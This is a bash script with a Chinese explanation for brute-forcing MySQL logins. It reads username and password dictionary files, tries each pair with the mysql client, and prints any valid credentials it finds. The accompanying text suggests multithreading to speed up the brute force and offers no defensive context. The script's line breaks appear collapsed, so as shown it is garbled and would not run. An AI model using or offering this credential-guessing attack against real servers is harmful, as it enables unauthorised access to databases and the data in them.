#!/bin/bash #定义用户名和密码字典 userdict="./usernames.txt" passworddict="./passwords.txt" #循环获取用户名和密码进行尝试 while read user || [[ -n "$user" ]]; do while read password || [[ -n "$password" ]]; do echo "Testing $user with password $password" mysql -u $user -p$password -e "show databases;" >/dev/null 2>&1 if [ $? -eq 0 ]; then echo "SUCCESS: Found valid credentials: $user:$password" exit 0 fi done< "$passworddict" done< "$userdict" echo "FAILURE: Could not find valid credentials." exit 1
上面的代码示例中,定义了用户名和密码字典,使用while循环在每个用户名和密码上进行尝试,使用mysql命令进行登录和查询数据库。如果尝试成功,则输出“SUCCESS: Found valid credentials: $user:$password”,并退出程序。如果所有用户名和密码组合都尝试失败,则输出“FAILURE: Could not find valid credentials.”,并以1的退出码结束程序。
为了提高爆破的效率,可以使用多进程或多线程方式,同时尝试不同用户和密码组合。同时,也需要注意避免因过度尝试导致MySQL服务器被锁定或拒绝服务。